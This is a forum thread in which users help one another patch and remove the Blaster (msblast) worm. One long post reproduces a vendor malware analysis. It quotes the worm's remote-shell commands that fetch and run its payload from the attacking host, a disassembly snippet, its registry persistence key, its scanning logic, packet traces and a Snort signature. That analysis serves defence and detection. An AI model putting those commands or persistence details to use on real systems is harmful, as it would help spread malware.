msblast.exe WTF?!?!?!?!?!

Factual Questions
81

Well, all things considered, msblast is pretty innocuous as far as worms go. It doesn’t do anything to your computer except use it as a base to infect others. The crashing etc is more a side-effect of this.

So it could be argued that the author has done us a favour by forcing everyone to update their patches before a really nasty virus came along using the same loophole. There’s little doubt that one will. How much worse would this have been if the virus triggered a reformat?

Still, won’t mean he’ll not get what he deserves.

82

Thanks, neutron star, I will print that out. My IT Boy at work is going to download something for me ionto a CD for me to take home, as my computer will only stay on for 30 seconds—It’s all very Mission: Impossible. He’s downloading "http://download.microsoft.com/download/9/8/b/98bcfad8-afbc-458f-aaee-b7a52a983f01/WindowsXP-KB823980-x86-ENU.exe."

• When I get home, what do I do with it?

• Do I still have to yank all the cables out of the back of my laptop?

• How will I start the machine? Do I just stick the CD in and click on it and hope the instructions will make snese?

• The Microsoft instructions say "install or update your antivirus signature software 4 (is that what’s on the CD?). Then download the worm removal tool from your antivuris vendor (download the who from the where on the what, then?).

• Will I need anything else to further protect me, or is that included on the above site?

83

My thoughts exactly, although I would go further and say that we should almost thank whoever wrote this worm. The security vulnerability has been public knowledge since June, but most people, me included, failed to apply the patch until the worm began spreading. I for one am glad to have been warned before nastier variants of it appear.

84

OK, so I think that I probably had the most inconvienent reformat ever. I wasn’t infected with the worm, and I think I might have actually gotten the patch (I remember getting an email from one of the lists I was one saying to get it now.) But since I reformatted my desktop (on the lappy right now, it’s running 98,so it’s safe) I just want to make sure I do this right.

Once I get XP installed (still doing that right now) I make sure I’m not connected to the internet, turn on XP’s firewall (I thinkI might actually have a copy of Norton firewall, will that work too? Maybe I’ll do both to be super safe.) Then connect and download patch, after patch is installed I should be safe, right? I mean, since I reformatted it can’t be there when I start, and in theory if I turn on the firewall it can’t get on.

85

Futile Gesture, there’s the irony. What makes this a nasty virus (albeit subtly nasty) is that as of this Saturday, every infected, unpatched system connected to the internet will attempt to execute a Denial of Service attack against windowsupdate.com. Meaning, after the 16th, if the DoS is successful, no one will be able to patch their systems reliably, unless Microsoft can develop a new distribution vector, and disseminate that new information to all users in a very short timeframe. Considering that there are, at the minimum, 120,000 infected systems, and possibly up to 1 million, at the very least windowsupdate.com will be intermittently knocked offline. And trust me, there are enough people online who will not have a clue what to do and will keep on rebooting their machinges and merrily logging on without a thought to fixing the exploit, that this threat will hang around out there for quite a while. It’s not the digital armageddon that many infosec “experts” are always railing about, but it’s certainly a prelude to something worse, IMHO.

[shallow, selfish bastard]
But then again, I work at a security company, so at least our stock will go up.
[/shallow, selfish bastard]
:smiley:

86

That’s pretty much the same thing my brother said four years ago about the Y2K problem. He made a cubic assload of money selling Y2K upgrade cards.

87

Okay, so I checked out the Microsoft patch site so I can download it on my home computer when I get home. But I’m not sure which version I need: there seem to be two for Windows XP, “32 bit version” or “64 bit version”. How can I tell which one I have on my computer? (It’s a laptop running XP Home edition).

88

You need this one Sparrow.

89

You need 32. AFAIK Home version doesn’t even come in 64 bit.

90

I don’t think I’ve seen this variation of the problem posted here.

At work, it seems our network has been infected. The big symptom is that IE will not spawn new windows. However, our internet connection is not crashing. Also, something I haven’t seen mentioned–the “search” function under our start menu seems to have been disabled. When you click on it, simply nothing happens.

Also, there is no “msblast.exe” under our processes in our task manager. (running Windows 2000.)

And I just noticed, cut and paste do not work in IE.

So, is this the same worm or not? It happened on the same day so I’m assuming it is. But then, why are the symptoms differing from everyone else’s?

91

I had your exact same symptoms on my work PC yesterday, except that I was able to see the msblast process running through Task Manager’s “Processes” tab. However, the virus was stopping me from disaling the msblast process.

Someone else in the office downloaded the Windows patch, and IMed it to me. By necessity, I installed the patch before removing msblast files from my system, then cold-booted my computer. After the cold boot, I was able to disable the msblast process, and delete msblast.exe from my C:/WINNT/System32 folder.

My Search for Files & Folders function was restored, so I double checked to make sure I had no files named “msblast” left on my machine. Finally, I went to www.symantec.com , downloaded their freeware msblast-killer program, and ran it. I cam eup clean at this point, and so far, I am satisfied that I am in the clear.

92

I hadn’t connected my laptop to the internet in a few weeks, and had been pretty regular with the MS updates, but yesterday after I did connect up, download the patch (though I’m fairly sure I already had it) and run the Symantec check for the virus (finding nothing) I’m no longer able to run auto-updates on any of my programs.

Norton AntiVirus has a button you can click to force a check for updates, rather than wait for the next round of updates, and when I click it, I get a message stating that the program cannot connect to the internet. I am able to manually go to the Symantec website, download the latest virus defs and whatnot, and install them, though.

Spyware, Search & Destroy has a “Check for Updates” button that returns the same failure message.

Ad-aware, same thing- can’t connect to the ‘net.

It’s affecting other programs, too- Semagic (an LJ client) can’t connect, though I have no problems whatsoever surfing the internet.

WTF?

93

Forgot to add, Frylock – I also run Windows 2000.

94

Yes. It’s the worm. Sounds very similar to the symptons I had, which is why I at first didn’t suspect a virus. I think what’s happening is that the virus is trying to infect, but not succeeding. But it’s killing RPC services along the way. All your problems are not caused by the virus directly, but because you lack this service.

Restarting the service manually or rebooting fixes the problem, until the next attack.

So you’re not infected, something about your system is causing the worm to fail. But you are still prone to the effects of the worm’s attempts at infecting from other computers. Apparently it’s not a very clever worm. But this hasn’t stopped it causing a whole lot of trouble.

The solution is the same: apply patches.

95

I recommend going out and purchasing a Linksys firewall/router if you have a broadband connection. No need for firewall software that conflict with any programs. I’m assuming that such a firewall will protect against any of these viruses.

Of course, I’m on a Mac, so I don’t think the mblaster will do a whole lot to me.

96

Using the patch and the worm remover you guys have posted links to, we seem to have eliminated the problem, but we’re keeping our fingers crossed.

Thanks, you guys, for saving us some bucks we could ill-afford to spend right now.

97

Thanks for all the help posted here.

OK, so I installed the patches from microsoft and the reboot problem seemed to disappear.

Then I installed Symatec’s fix tool and tried to run it, but it wouldn’t run completely. I tried to run it in safe mode, but couldn’t get my safe mode to work (?).

I manually deleted the msblast file in the system32 folder and in the prefetch folder. The file is not listed in my start menu. I enabled the firewall and everything seems to be working OK now. Do I need to do anything else?

98

Now that Variant Blaster.b has been unearthed it is a matter of time before someone makes a Memory Resident version.

Patch Patch and Patch

Blaster.b seems to only be using a different exe. The name is Penis.exe (if that gets deleted that is to say malegenetaliapropername.exe )
Some Symptoms

svchost.exe error message after “spontaneous” reboot

  • copy and paste functions don’t work anymore (file contents, or files themselves)
  • FIND window doesn’t work
  • properties of any event in event viewer

These are the result of failed attempts to exploit the vulnerability. Due to a bug in the worm, this is a side effect of the infection behavior. Once patched, the systems should no longer exhibit these behaviors.

If the Fixtool does not detect W32.Blaster on these systems, AND the OS on these is eiter NT4, or Windows 2003 server, then you have explain to them that that is correct. While W32.Blaster.Worm cannot spread to Windows NT or Windows 2003 Server, unpatched computers running these operating systems may crash as the result of attempts by the worm to exploit them.

Understand ?
NT and 2003 are Vulnerable but may not aid propagation or be infected .

Questions

Q. Can this particular worm be memory resident like slammer?
A. No, not this worm.

Q. How does it get in? Definitely not email?
A. Network based purely at present. In general, the following ports should be filtered at the netowrk perimeter TCP/UDP 135, UDP 137, UDP 138, TCP 139, TCP/UDP 445 and TCP 593. In relation to this particular exploit, block access to TCP port 4444 at the firewall level, and then block the following ports, if they do not use the applications listed: TCP Port 135, “DCOM RPC”, UDP Port 69, “TFTP”.
Q. Does the worm propage using typical uname and pass?
A. An attacker can exploit this vulnerability by crafting a specifically malformed RPC packet and sending it to a vulnerable server. The attacker will need access to the vulnerable server RPC interface that is located at port 135. A malicious attacker may use this vulnerability to execute code of his choice on the victim machine. Since the RPC service executes with SYSTEM privileges an attacker executing code as the result of this attack can fully compromise the vulnerable server

Q. Is a reboot required to activate the virus the machine?
A. A reboot is NOT required for the msblast.exe file to executed. See below:
“The worm will start a tftp server on the attacking host; this will allow the victim host to download a copy
of the worm (msblast.exe) after a successful compromise. The worm will also open a command shell on
TCP port 4444 on the victim host, allowing commands to be sent to the infected system. The worm will
issue the commands “tftp <host> GET msblast.exe” and “start msblast.exe” over the command shell. The
command shell on TCP port 4444 does not remain open after the attacking host disconnects subsequent
to issuing its commands.”

Q. What’s the intensity of the network scans?
A. The attacking host will issue 20 simultaneous connect() calls, each going to a unique IP address. The
host will then use a select() call to determine which host have responded. Upon receiving a response the
worm will attempt to exploit the host. Therefore for each infected host, 20 could be potentially attacked.

Q. If it’s propagating by ‘guessed IP addresses’ then can it potentially cause printers to print garbage like bugbear did?
A. It definitely will potentially hit IP-based network printers but the effects it will have are still unclear. The question is, do network printers listen for RPC on port 135? Will update you on this asap.

The W32.Blaster worm, which propagates via the Microsoft
Windows DCOM RPC Interface Buffer Overrun Vulnerability, has
recently been observed propagating at notable rate in the wild.
The *********** team has obtained a copy of the
worm and has conducted an analysis of the binary.
Action Items
The ********* Team encourages network
administrators to:
•Ensure that all available patches and feasible mitigating
strategies provided in Microsoft Security Bulletin MS03-026
have been applied.
•Ensure that the following ports are filtered at the network
perimeter and between all untrusted network segments:
udp/135, udp/137, udp/138, tcp/135, tcp/445, tcp/593.
•Deploy the provided Snort signature to assist in the
detection of exploitation attempts targeting this issue.

Technical Description

It is known that the W32.Blaster worm attempts to conduct a Denial of Service (DoS) attack against
windowsupdate.com during a specific time period. The worm checks to see if the date is later than
August 15, and prior to December 31. If these conditions are met, the denial of service attack will be
performed.

The DoS attack will also be launched after the 15th of each month that is not in the
aforementioned range.

The worm will start a tftp server on the attacking host; this will allow the victim host to download a copy
of the worm (msblast.exe) after a successful compromise.

The worm will also open a command shell on
TCP port 4444 on the victim host, allowing commands to be sent to the infected system. The worm will
issue the commands “tftp <host> GET msblast.exe” and “start msblast.exe” over the command shell. The
command shell on TCP port 4444 does not remain open after the attacking host disconnects subsequent
to issuing its commands.
The worm can spread via Windows 2000 and XP. It uses two universal offsets, one for each affected
operating system.

The following code segment is used to determine the offset used to compromise a
vulnerable host. There is an 80% chance that the Windows XP offset will be used and a 20% chance that
the Windows 2000 offset will be used for exploitation.
.text:00401496 mov ds:data_whichOffset, 1
.text:004014A0 call rand
.text:004014A5 mov ecx, 10
.text:004014AA cdq
.text:004014AB idiv ecx
.text:004014AD cmp edx, 7
.text:004014B0 jle short loc_4014BC
.text:004014B2 mov ds:data_whichOffset, 2

The worm also carries a payload of encoded shellcode.
The worm adds the following key to the registry upon successful exploitation:
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\windows auto update
This registry key contains the value “msblast.exe”. This is likely to ensure that the worm will run upon
system startup.
In order to prevent the worm from being executed multiple times on a single system, the worm creates a
mutex lock using the name BILLY.
The attacking host will issue 20 simultaneous connect() calls, each going to a unique IP address. The
host will then use a select() call to determine which host have responded. Upon receiving a response the
worm will attempt to exploit the host.
The worm uses an algorithm based off the current local host IP address to find IP address to attack.
Given the local host IP address A.B.C.D, ‘D’ is set to zero. If C is greater than 20, a random number (less
than 20) is subtracted from C. Once this semi random IP address has been calculated, the worm will
continually increment the IP address, attacking in a sequential order. This means the local subnet will
become saturated with port 135 requests prior to exiting the local subnet.

Packet Traces
The following packet traces depicts scanning for vulnerable machines conducted by the worm:
08/11-16:56:52.942469 0:C:29:41:1F:13 -> 0:50:56:C0:0:1 type:0x800 len:0x3E 172.16.77.129:1249 -> 62.177.236.1:135 TCP TTL:128 TOS:0x0 ID:23199 IpLen:20 DgmLen:48 DF *****S Seq: 0xD01F7CE9 Ack: 0x0 Win: 0x4000 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/11-16:56:52.943438 0:C:29:41:1F:13 -> 0:50:56:C0:0:1 type:0x800 len:0x3E 172.16.77.129:1250 -> 62.177.236.2:135 TCP TTL:128 TOS:0x0 ID:23200 IpLen:20 DgmLen:48 DF *****S Seq: 0xD020129A Ack: 0x0 Win: 0x4000 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/11-16:56:52.944197 0:C:29:41:1F:13 -> 0:50:56:C0:0:1 type:0x800 len:0x3E 172.16.77.129:1251 -> 62.177.236.3:135 TCP TTL:128 TOS:0x0 ID:23201 IpLen:20 DgmLen:48 DF *****S Seq: 0xD020F1CE Ack: 0x0 Win: 0x4000 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
The following packet trace illustrates an infection attempt against a potential victim:
08/11-15:26:09.095239 0:C:29:41:1F:13 -> 0:50:56:C0:0:1 type:0x800 len:0x3E 172.16.77.129:4010 -> 172.16.61.2:135 TCP TTL:128 TOS:0x0 ID:13809 IpLen:20 DgmLen:48 DF **S Seq: 0x7B91948D Ack: 0x0 Win: 0x4000 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/11-15:26:09.095309 0:50:56:C0:0:1 -> 0:C:29:41:1F:13 type:0x800 len:0x3E 172.16.61.2:135 -> 172.16.77.129:4010 TCP TTL:64 TOS:0x0 ID:0 IpLen:20 DgmLen:48 DF AS Seq: 0x378FC8B6 Ack: 0x7B91948E Win: 0x16D0 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/11-15:26:09.095923 0:C:29:41:1F:13 -> 0:50:56:C0:0:1 type:0x800 len:0x3C 172.16.77.129:4010 -> 172.16.61.2:135 TCP TTL:128 TOS:0x0 ID:13810 IpLen:20 DgmLen:40 DF A Seq: 0x7B91948E Ack: 0x378FC8B7 Win: 0x4470 TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/11-15:26:17.131282 0:C:29:41:1F:13 -> 0:50:56:C0:0:1 type:0x800 len:0x7E 172.16.77.129:4010 -> 172.16.61.2:135 TCP TTL:128 TOS:0x0 ID:13856 IpLen:20 DgmLen:112 DF AP Seq: 0x7B91948E Ack: 0x378FC8B7 Win: 0x4470 TcpLen: 20 05 00 0B 03 10 00 00 00 48 00 00 00 7F 00 00 00 …H… D0 16 D0 16 00 00 00 00 01 00 00 00 01 00 01 00 … A0 01 00 00 00 00 00 00 C0 00 00 00 00 00 00 46 …F 00 00 00 00 04 5D 88 8A EB 1C C9 11 9F E8 08 00 …]… 2B 10 48 60 02 00 00 00 +.H`…
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/11-15:26:17.131320 0:50:56:C0:0:1 -> 0:C:29:41:1F:13 type:0x800 len:0x36 172.16.61.2:135 -> 172.16.77.129:4010 TCP TTL:64 TOS:0x0 ID:30958 IpLen:20 DgmLen:40 DF A Seq: 0x378FC8B7 Ack: 0x7B9194D6 Win: 0x16D0 TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/11-15:26:17.132220 0:C:29:41:1F:13 -> 0:50:56:C0:0:1 type:0x800 len:0x5EA 172.16.77.129:4010 -> 172.16.61.2:135 TCP TTL:128 TOS:0x0 ID:13857 IpLen:20 DgmLen:1500 DF A Seq: 0x7B9194D6 Ack: 0x378FC8B7 Win: 0x4470 TcpLen: 20
I have a lot more captures if you need them .

Also if anyone wants teh Snorts then let me know
Description of Vulnerabilities
Microsoft Windows DCOM RPC Interface Buffer Overrun Vulnerability
http://www.securityfocus.com/bid/8205

A buffer overrun vulnerability has been reported in Microsoft Windows that can be exploited remotely via
a DCOM RPC interface that listens on TCP/UDP port 135. The issue is due to insufficient bounds checking
of client DCOM object activation requests. Exploitation of this issue could result in execution of malicious
instructions with Local System privileges on an affected system.

IDS Signatures
Update: There have been reports indicating the included snort signature (see below) fails to properly
detect all worm related traffic. The problem appears to be related to the “flow: established” directive. To
ensure proper detection, organizations may want to remove the “flow: established” directive.
The Threat Analyst Team has created the following Snort signature designed to detect exploitation of the
Microsoft Windows DCOM RPC Interface Buffer Overrun Vulnerability.
alert tcp $EXTERNAL_NET any -> $HOME_NET 135 \ (msg:“DCE RPC Interface Buffer Overflow Exploit”; \ content:"|00 5C 00 5C|"; \ content:!"|5C|"; within:32; \ flow:to_server,established; \ reference:bugtraq,8205; rev: 1; )

Based on the analysis of the code found in rpcss.dll and information available in the advisory released by
the Xfocus researchers, it has been determined that an unchecked copy operation into a 32-byte buffer
occurs in function “GetMachineName”. The signature works by identifying NetBIOS names in packets
destined for the RPC ports that are greater than 32 bytes in length. A NetBIOS machine name is
delimited by UNICODE sequences “\” and “”.
False positives may occur if an innocuous string satisfying the above criteria is found in an RPC packet.
The likelihood of this particular combination of characters occurring outside of the scope of NetBIOS
machine names is quite low, and as such the number of false positives is expected to be minimal. False
negatives are not expected.

The following IDS vendors have released signatures to detect exploitation attempts against the Microsoft
Windows DCOM RPC Interface Buffer Overrun Vulnerability.

Mitigating Strategies
Ensure that the following ports are filtered at the network perimeter: TCP/UDP 135, UDP 137, UDP 138,
TCP 139, TCP/UDP 445 and TCP 593.

99

I should explain the symptoms

SVCHOST is a services manager for all services requiring a dll pull

So it marshalls a number of services yeah ?

One of these is epmap which is the end point map for …guess what…135

SvcHost goes down it brings the rest with it

100

hmmm…

Thought the formatting was nicer than that :frowning:

I realise that I havent explained why NT & 2003 are not affected.

TFTP (Trivial File Transfer Protocol ) just aint there.

So they cant talk pack to the initial 20 searching IP hits.

This does NOT mean they are not Vulnerable to 135 overflow though. They should still be patched